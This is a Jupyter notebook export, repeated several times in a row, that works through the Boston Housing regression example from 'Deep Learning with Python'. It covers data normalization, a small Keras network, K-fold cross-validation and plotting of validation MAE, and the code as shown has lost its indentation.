val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
_____no_output_____
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
import seaborn as sns ; sns.set()
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.legend()
plt.show()
###Output
No handles with labels found to put in legend.
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model1 = build_model()
# Train it on the entirety of the data.
model1.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model1.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
